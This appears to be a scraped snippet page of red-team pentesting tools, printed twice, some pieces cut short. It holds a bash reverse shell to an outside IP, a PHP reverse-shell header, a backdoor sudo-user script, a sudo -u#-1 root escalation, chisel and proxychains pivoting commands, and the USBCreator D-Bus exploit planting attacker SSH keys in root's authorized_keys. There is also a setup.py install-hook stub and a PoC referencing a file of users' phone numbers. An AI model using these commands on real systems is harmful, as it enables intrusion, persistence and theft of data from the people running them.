lethanhphuc noobpk

## encovi_poc.py
# -*- coding: utf-8 -*-
import requests
import pyDes
import binascii
import json
import sys

def encrypt3DES_sendRequest():
    try:
        f = "/Users/lethanhphuc/Pentests/Redteam/PoC/NCOVI/List_Phone_User.txt"

## setup.py
#usage: sudo /usr/bin/pip install . --upgrade --force-reinstall
from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
  def run(self):
    install.run(self)

## reverse-shell.php
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.12';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';

## spawn.sh
python -c 'import pty; pty.spawn("/bin/bash")'

## create-user.sh
#!/bin/bash
sudo useradd -p \$(openssl passwd -1 1_2_3Qwe) noobpk
usermod -aG sudo noobpk
echo [*]Done

## fork.sh
sudo -u#-1 /bin/bash

## ssh-with-proxychains.txt
#proxychains config: /etc/proxychains.conf

ssh -D <port-proxychains> root@<ip-target>

proxychains <application> <application-option>

## chisel-port-tunneling.txt
#https://github.com/jpillora/chisel

chisel client <ip-server>:<port-server> R:4506:127.0.0.1:4506 R:1234:127.0.0.1:1234

chisel server -p <port> --reverse

## re-shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.4/4444 0>&1

## note.txt
#document: https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
#detect
remote-machine> ps auwx | grep usb

remote-machine> echo "attack-machine id_rsa.pub key" > ~/authorized_keys

remote-machine> gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/remote/authorized_keys /root/.ssh/authorized_keys true

attack-machine> ssh -i id_rsa root@10.10.10.10
	# -- coding: utf-8 --
	import requests
	import pyDes
	import binascii
	import json
	import sys

	def encrypt3DES_sendRequest():
	try:
	f = "/Users/lethanhphuc/Pentests/Redteam/PoC/NCOVI/List_Phone_User.txt"
	#usage: sudo /usr/bin/pip install . --upgrade --force-reinstall
	from setuptools import setup
	from setuptools.command.install import install
	import base64
	import os


	class CustomInstall(install):
	def run(self):
	install.run(self)
	<?php

	set_time_limit (0);
	$VERSION = "1.0";
	$ip = '10.10.14.12'; // CHANGE THIS
	$port = 1234; // CHANGE THIS
	$chunk_size = 1400;
	$write_a = null;
	$error_a = null;
	$shell = 'uname -a; w; id; /bin/sh -i';
	#!/bin/bash
	sudo useradd -p \$(openssl passwd -1 1_2_3Qwe) noobpk
	usermod -aG sudo noobpk
	echo [*]Done
	#proxychains config: /etc/proxychains.conf

	ssh -D <port-proxychains> root@<ip-target>

	proxychains <application> <application-option>
	#https://github.com/jpillora/chisel

	chisel client <ip-server>:<port-server> R:4506:127.0.0.1:4506 R:1234:127.0.0.1:1234

	chisel server -p <port> --reverse
	#document: https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
	#detect
	remote-machine> ps auwx \| grep usb

	remote-machine> echo "attack-machine id_rsa.pub key" > ~/authorized_keys

	remote-machine> gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/remote/authorized_keys /root/.ssh/authorized_keys true

	attack-machine> ssh -i id_rsa root@10.10.10.10